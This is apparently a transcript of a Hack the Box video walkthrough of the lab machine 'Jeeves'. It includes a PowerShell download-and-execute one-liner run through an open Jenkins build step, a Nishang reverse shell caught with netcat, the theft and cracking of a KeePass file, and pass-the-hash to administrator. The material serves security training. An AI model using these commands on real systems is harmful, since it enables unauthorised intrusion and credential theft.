Alright, so today we're going to be doing Jeeves from Hack the Box. It's a medium retired Windows box. Now, I just finished doing a write-up on GitHub, but I thought I'd go ahead and make a video for all the visual learners to follow along and use it as supplemental information there. So let's go ahead and just jump right into it. We're going to break this down to 4 steps. We're going to first start off with our enumeration. I'm going to go ahead and do our second step, which is going to be our initial foothold. Our third step is going to be privilege escalation, and our fourth step is going to be just basically showing you how to get the root flag. Because when I did it, there was a little bit of a hiccup actually typing it out. It's a little bit of a trick you got to do there. I'll show you guys how to do that right there at the end of the video. So let's go ahead and jump right into it with an Nmap scan. We have our target IP of 10.10.10.6.3. Then start out with an Nmap -sc for scripts and -sv for versions. Our target IP 10.10.10.6.3, and if you'd like you can do -oa to output all. Just name it whatever you want, file name.nmap.txt, whatever you'd like. I already ran this scan to save some time, so I'm going to go ahead and pull that up. And here we go. So it looks like we have 4 open ports on our target machine. We have port 80 running an HTTP service. Looks like it's Microsoft IIS version 10. We have Microsoft RPC on 135, and 445 is SMB. But it looks like we also have another HTTP service here on port 50,000. Nmap enumerated this to be something called Jetty version 9.4. That looks a bit interesting here, but we're going to go ahead and start with port 80 and see what is hosted on that. So let's go ahead and open up Firefox and navigate over to our target 10.10.10.6.3, and it looks like we have Ask Jeeves running as a service here. So what I like to do in my enumeration is, while I poke around the website, I like to run around I like to run Dirbuster in the background. We'll go ahead and put HTTP 10.10.10.6.3. We'll leave it as that since port 80 runs by default. I'm going to use a medium word list here and turn off be recursive. Now that medium word list, I'll explain this while I run that scan. You can replace this for whatever you'd like. I like to use this medium word list, although if you want to check out sec lists on GitHub, they have great lists. I know they even have lists tailored to the specific application that you're enumerating. So definitely check out SecList if you're looking for a good word list, whether it's Dirbuster or cracking hashes, whatever the case may be. Now we're going to go ahead and just check out what we have here. If we just type in test, and it gets an error page. That's probably what that error.html was that I just saw here on our Dirbuster report. These error pages are very useful. We can see that it's running a Microsoft Windows NT and Microsoft SQL Server 2005. So this is some great information here. But what I want to do is go ahead and continue enumerating. I'm going to actually go ahead and pause this now. Since I already did this box, I know this is all we're going to get from this port. So I'll go ahead and stop that and go back. Let's pull up our Nmap scan again. I'll tell you right now, I got no results from RPC on port 135 and SMB on port 445. As a matter of fact, when I tried connecting to SMB, I was actually getting the connection refused, so that was a dead end for me. But port 50,000, that other HTTP service, we're going to go ahead and check that out right now. So let's go back to our web browser. Keep our target IP the same, except we're going to append 50,000 to the end of it. See what's going on port 50,000, and Nmap was right. It is running a version of Jetty, version 9.4. And this is where I initially fell into a rabbit hole. So what I did here is I went ahead and opened up Dirbuster again, And this time I want to enumerate my files and directories on port 50,000. Same word list, and all the settings will be the same. And while that's running in the background, I was trying all types of exploits actually, and I'll save you time now. I tried some exploits from ExploitDB. I tried some exploits from GitHub. I also tried some exploits from Metasploit. None of them were fruitful, unfortunately. I did get a little bit of leverage here with the directory traversal that I found on Exploit Database, although it wasn't the way in that I was looking for. And by the time I tried all these exploits, my Dirbuster was finished running. And with that being said, I'm going to go ahead and actually stop this Dirbuster because I already did this box. I have the results here. I'll pull it up to save some time. So our Dirbuster on port 10.10.10.63, port 50,000, showed that we had a directory called Ask Jeeves. And when I saw this, I basically stopped all my attempts to exploit Jetty, and I went ahead and visited this directory on this port. And this basically opened up a new attack surface for me. So we go to this slash ask Jeeves and let this load. And we see that we're running a version of Jenkins. So if you're not familiar with Jenkins, what this is, it's a automation software that developers use to build and deploy their projects or whatever their application or software is, and they can use this to do that automatically. Now what I noticed with this Jenkins is that it lets anybody go in and basically create a project, and that's what we're going to go ahead and do now. So you can either click create new job on that main page if it shows it there, or you can click new item on the left like I just did and create a project, and we're going to do that right now. Name it whatever you like. I'll call this new project, and we're going to choose freestyle project. And on the next page here you can see that we have all types of options, but the option that stuck out to me the most was under build here towards the bottom, and where it says add build step, we're given the option to do all types of things such as execute Windows batch command, execute shell, invoke ant, run with timeout, basically everything. But the thing I had my eyes on the most was execute Windows batch command. So we're going to want to go ahead and select this, and we're going to type out a PowerShell one-liner. So when this is saved and it actually builds and it executes this Windows batch command, we're going to get our initial foothold. Now the way we're going to do this is by using this one-liner that I use quite often. I highly suggest committing it to memory because I use it all the time, and that is PowerShell invoke expression. So PowerShell IEX new dash object net.webclient dot download string. In parentheses here we put HTTP. Now we're going to put our attacker IP. I'll leave this as 10.10.10 for now. I'm going to have to change this later. Port 8080. Probably going to have to change this later as well. And our file name .text. Close these parentheses. And this is the PowerShell one-liner. And basically what this does is it calls for this file, it calls this URL, and it will execute this file wherever it's executed on, and whatever machine is hosting this Jetty's application will be executing this. So this is the way we get our initial foothold. The tools we're going to be using here, so I'm going to leave this here for now. We have a couple things we have to do before we save and build this. So the first thing we're going to do is actually get our toolkit. I'm going to use a Nishang shell. I'm going to be using invoke PowerShell TCP. It is a PowerShell script. If you don't have it, you can just Google on GitHub Nishang or invoke PowerShell TCP. You'll find it there. And we're going to go ahead and just open this up. This is the script that we want to execute on our victim machine. The way it works is you just find the option that you want at the top and append it there at the bottom. I want to actually get a reverse shell here, so I'm going to choose this one. We're just going to copy this. The invoke PowerShell TCP reverse dash IP address, the IP, the port, and I'm going to copy that, take it all the way to the bottom, and paste it right here at the bottom. Now there is a couple things we do need to change here, such as the IP address and the port. I had to change this to my IP address, so let me actually get my IP address because I'm not sure what it is. Do a quick if config. Looks like my IP is 10.10.14.18. So we're going to replace this with our IP address, 10.10.14.18. And we're going to replace the port with whatever port we are going to be listening on using a tool called netcat. Now this tool should be built in if you're using Kali or Parrot. It's not built in. You can just Google netcat and find a way to download it, but it should come pre-installed, and I'll help you set that up here in a moment. For now, just choose any port. I'm going to choose port 4001. Save this file, because now that the script itself is good to go, first we need to serve it. So the attacker machine, or the victim machine, I'm sorry, can actually call to it and download it. So our invoke PowerShell TCP file is in this directory, our Jeeves directory, so I'm just going to serve this directory here. To do that, we could do python 3-m for modules, http.server, and I'm going to do port 8080. Whoops, delete that little slash there, and there we go. So we're serving this directory on our IP address on port 8080. Now it is worth noting that you could also use the non-Python 3 version, just python-m for modules, and do simple HTTP server and port 8080. You could do this as well if you'd like. It doesn't really matter as long as you're hosting your file. Because now what we have to do is go back here to our Windows batch command and edit it. So the IP address is not 10.10.10.10. It's going to be our IP address, so 10.10.14.18. I actually don't have to change the port because I am hosting it on port 8080. And for file name.txt, I need to change it to the file that I wanted to call, which was the invoke PowerShell tcp.ps1 file. Let me make sure I have that spelled correctly. Yep, TCP is not all caps. Perfect. Although PowerShell has a big S in it, so let me go ahead and capitalize this. And there we go. So our script should be good to go, but before I save and build this, we have to set up a listener so we can actually catch the shell. So this is going to be our server tab. Let's create a new tab. This is going to be our netcat tab. So netcat-lvmp, and we're going to set it up. I believe I put it through port 4001 if I'm not mistaken. Let me double check at the bottom of our script. Yep, it's going to be calling back to port 4001. So let's go ahead and hit enter. And now we're waiting for any connections on our IP address on port 4001. So our script is all good to go. We are hosting it on our attacker machine, and we have our listener ready for a connection. So it looks like we're all set to go. We're going to go ahead and save this. We're going to go ahead and hit build now. And as soon as you hit build, you should see a request for the file. There it is. So it looks like our victim is already called our machine, our attacker machine, to get this file, and it should execute it. And as soon as it executes this .ps1 file, we should have our netcat shell. And here it is. So we have our initial foothold. See, who am I? We are user Kasuki. While we're here, we can get our root flag. So we'll go over to Kasuki's desktop. And there is our user flag. I'm not going to go ahead and type it out, but we're going to move on from here. Now we need to get our privileges escalated, basically, because if you can see here, I will not be able to go into the administrator directory. You see permission is denied when I tried listing out their desktop. So it's not an option for us. Let's go ahead and escalate our privileges. So after poking around what we had access to, I noticed that in the documents folder of Kasuki, there was a file called ceh.kdbx. So this is a KeyPass file. Now KeyPass is basically a password manager. If you want to correlate it to something, you can correlate it to iCloud keychains for iPhone users. How it saves your password every time you type it into a website. That's a keychain, but for iCloud. Or for Samsung Android users, I believe there is Samsung Pass, where every time you type in a password, it will save that password for you on your device on a keychain. KeyPass is kind of like the same thing, except it's local. It's not a cloud-based application. So what we're going to do here is we want to actually go ahead and get this KeyPass file. So in order to do that, there's a few ways of downloading files from your victim's machine once you have access. So data exfiltration can be done a few ways. I like to do it quick and simple this way. We'll do it using Impacket SMB server. Now if you don't have this, you can just Google Impacket SMB server and download the Impacket tool suite as well, although this should also come pre-installed on Kali and Parrot OS if that's what you're using. So to jump right into this, let's go ahead and set up an Impacket SMB server. The way the Impacket SMB server wants you to format the command, so it's going to be Impacket-SMB server, the share name. I'm just going to call my share name SMB. And the actual directory that we're going to be hosting on SMB. So I'm going to actually host our Jeeves folder. So any files that I downloaded, I want it to come to our Jeeves folder. So htb/Jeeves, and you hit enter. Now if you get this error message, permission denied at the bottom, you simply just have to run it as sudo and you can see that our SMB server is now all set. Our share is going to be SMB on our IP address 10.10.14.18. It's going to be hosting this folder. Let's go back to our shell here. And since we're already in our documents directory, I want to copy this CEH KeyPass file over to our Jeeves folder. We're going to type in copy the actual file that we want, so ceh.kdbx, 2 backslashes to designate that we are calling a share. My IP address is going to be 10.10.14.18. Another backslash. Your share name, I named my share SMB to keep it simple. And whatever you want the file to be called on our local machine, I'm just going to keep it as is, CEH.KDBX, although it can be whatever I want. I'm going to go ahead and hit enter. Should have been done. We see that we have our connection here. If I list out the contents of my Jeeves directory, we see we now have CEH.KDBX. So, like I mentioned, this is a KeyPass file. You can use KeyPass 2 to open this. There's tons of ways to open this. I believe this comes pre-installed on Parrot, and I believe it also comes pre-installed on Kali as well. But it looks like we need a password to open up CEH.KDBX. Now, to get this password, you can type in password, not going to work. We're going to do something a little bit different here. So, we're going to be using John. John the Ripper has a tool suite. And in that tool suite, we're going to be using a tool called KeyPass to John. If you don't have the tool suite, you can just Google John the Ripper or KeyPass to John. You can download it as well, although it should also come pre-installed on Parrot and Kali. So KeyPass to John, let's go ahead and take a look at the syntax. It wants KeyPass to John, the actual key file, and then we can actually just shoot it over to another file right there. So ceh.kdbx, so key pass to John, put in our key file, ceh.kdbx, go ahead and append it to this file. We're going to call it ceh.hash and just hit enter. As you can see here, it created our ceh.hash file. I'm going to go ahead and cat this ceh.hash file, take a look at it, and there we go. So we have a crackable hash now. It turned the key pass file into a crackable hash, which we'll be feeding over into hashcat now to get that clear text password. Before I do that though, let me go ahead and remove this thing here that says CEH, because that's not supposed to be there. That will actually mess up our crack when we put it into hashcat. There we go. So we should be good to go to put this now into hashcat. Now if you're not familiar with hashcat, hashcat is another tool set that I like to use for cracking hashes. If you don't have it, you can also look it up on Google. All these tools are readily available online, although this will also most likely come pre-installed on your Kali or Parrot OS installation, so no need to do all that. And the way it wants our syntax to be is hashcat, any options that we would like, our hash or hash file. I'm going to put in a hash file, the .hash file that we just generated, and then our dictionary. So let's go ahead and do that now. So I'm going to type in hashcat. Now you can look this up, whatever the key pass hash is, right? And you can actually get the list of hashcat hash types if you Google it, and even the -- help will show you as well. I already know that the hash type for key pass is going to be 13,400. And after we put that option there, we're going to input our hash file, ceh.hash, and our dictionary. So our dictionary file, I have rocku.txt on my desktop. You can use, like I mentioned earlier, seclist for any word lists. Rocku.txt will come with, I believe, with Kali and Parrot as well, pre-installed. If you don't know where it's at, you can just locate rocku.txt. You'll most likely find it in your word list directory. But to keep it simple, I'm going to leave it as rocku.txt. I'm not going to use any specially curated passwords or anything like that. One thing I do like to do with hashcat sometimes is run it sudo, because my crack will not work unless I do. I'm going to go ahead and hit enter. Go ahead and run that again. Alright, our key pass hash is here. I'll run that one last time. Looks like it wasn't going. So hashcat, we'll remove the sudo for now, hashcat-m 13400 ceh.hash. And you know what? I think I'm just going to leave it as rocku.txt because I believe it's in my Jeeves directory. There it is. Hit enter on this. Did not work. Put sudo in front of it. Still not working. It's a bit strange here. Let's see what's going on. Go ahead and take a look and see if we are using the right hash, 13400. I'll make sure we're using the right one for key pass here. Okay. If I'm not mistaken, it is -M for hash modes. Give me a moment here. I'm just looking through my syntax. -M for hash type. Okay. So it is 13400 for key pass and key pass 2. Go ahead and type it out again fresh this time. Hashcat -M for hash 13400. Our hash is going to be ceh.hash. What I might end up doing is stop feeding it a hash file and instead put the hash in directly. See if that resolves the issue. ceh.hash. And I don't believe I have to put a flag for the word list. I believe I can just call right to it. Nope, so our dictionary, I'll just go ahead and add our dictionary file here. It's going to be rocku.text. Huh. Okay. So that's a bit strange. It wasn't showing it on the screen. I didn't read the error message last time. It was cracking it. Um, I'm blanking out here as to why it wasn't showing me. But if I hit --show on either the flag, it will show me the cracked hash. Just a little bit of a different output. So it's throwing me off there. So our cracked hash is actually going to be moonshine1. So this is our clear text password of our hash here. All this is basically meaning moonshine1. So we're going to take this password, moonshine1. We're going to open up that key pass file again. And since now we have the clear text password of moonshine1, it should let us access it now. And there we go. So now we have access to the CEH key pass file. We can do further enumeration in regards to escalating our privileges from Kasuki to administrator. Now I went through all of this earlier, and I noticed that there was really nothing too interesting here except for backup stuff. Now, when you open up backup stuff and you actually take a look at the password that it has, you'll notice that this looks like an MTLM hash. Now with an MTLM hash, if this is an active credential, what we'll be able to do with this is I'll copy this here, and we'll be able to perform an attack called patch the hash. And instead of actually cracking it, we can just pass it over to a tool such as WinExe. So if you have this tool, I believe it comes pre-installed. It's pth-winexe. You'll be able to pass your hash. And we're going to do that now. I copied the hash over that was located in the backup stuff. Went ahead and copied this password over. Let's go ahead and pass this hash over using this tool and see if it lets us in. So pth-winexe dash u for user. That's how it wants us to do the syntax. What I want to do is I want to get in as administrator. Then we're going to want to append a %sign in the password. And in this case, the password is just going to be a hash. So put a %sign and we're going to paste our hash in right here, our NTLM hash. And then we'll just basically put what we want to do. So our target, of course, which is going to be our target of 10.10.10.6.3, we just want to do cmd.exe. So when I hit enter here, it's going to basically pass the hash to administrator. So this is the username, %sign. This is the password, except in hash format, NTLM hash format, to our target, 10.10.10.6.3, executing the command of cmd.exe. Hit enter. Alright, so my mistake here is it's not backward slashes, that is my mistake, it's forward slashes. 10.10.10.6.3 is the host, and the command that we want is cmd. Sorry, got used to SMB there. So when we hit enter, we see that it is substituting the user and substituting the supplied NTLM hash, and it looks like we got in. So if we type in who am I, oh, I'm not going to bother stabilizing this shell here, but if we see who am I, we are now administrator. So we can go to the C directory, cd to users, cd over to administrator. Looks like now we're able to list this content. So if we go over to the desktop, we can see now that we can get our root flag, except now that we completed our privilege escalation, this was the part I was mentioning how you may run into a little bit of a hiccup getting this. So what happened here is that you can actually append dash the R flag to your dir command, and you'll see that there is actually a stream file to hm.txt, right? So we type out hm.txt. You'll see that it says the flag is elsewhere, look deeper. Appending that slash r, that slash r to your dir command, you'll see that root.txt is being streamed by this file. Now you can Google how to display a streamed file, right, in Windows through command prompt. But I like to use PowerShell. You could actually use PowerShell to get this file here, and the way you do it is PowerShell get dash content. Right, you're gonna put the path flag, so the path to the file that you want. So it's gonna be C users administrator. It's on his desktop, and it's hm.txt. So we want the streamed content from hm.txt. So we're gonna add stream root.txt. We can only get to root.txt through this data stream. I'm gonna go ahead and hit enter, and that will give us our root flag, and that's how you do it. So I'll go over that command one more time. It's PowerShell command get dash content. All right, put our path dash path flag to where we want the path of the original file, and then the dash stream flag to the streamed file, the data stream file, root.txt. Don't forget, you will not see this unless you do dir/r. And that was the trick that got me the most. But other than that, that is the end of the box. It was a fun box. I'll go ahead and close this now. You can submit your flags. I believe the biggest takeaway from this was to enumerate while you're falling down rabbit holes, because if you're going to fall down a rabbit hole, you might as well be enumerating in the background, whether it's Nikto, Dirbuster, some type of recon scan, whatever the case is. And to really use that PowerShell. So PowerShell was a great way to get in. There's a few other ways how we did the command execution with the PowerShell one-liner. There was a few other ways to do it. I preferred this way. If you haven't done data exfiltration before, getting that ceh.kdbx file was a great way to practice methods. We used SMB, the in-packet SMB suite, but we could have maybe uploaded netcat to our victim machine and sent over that file through netcat. There's a few different ways. I believe this box lets you try different methods and learn a few ways to do things. Now, the way I did it today was the way I prefer to do it, but it's definitely not the only way. So I'll go ahead and post this onto the GitHub, and thank you for watching.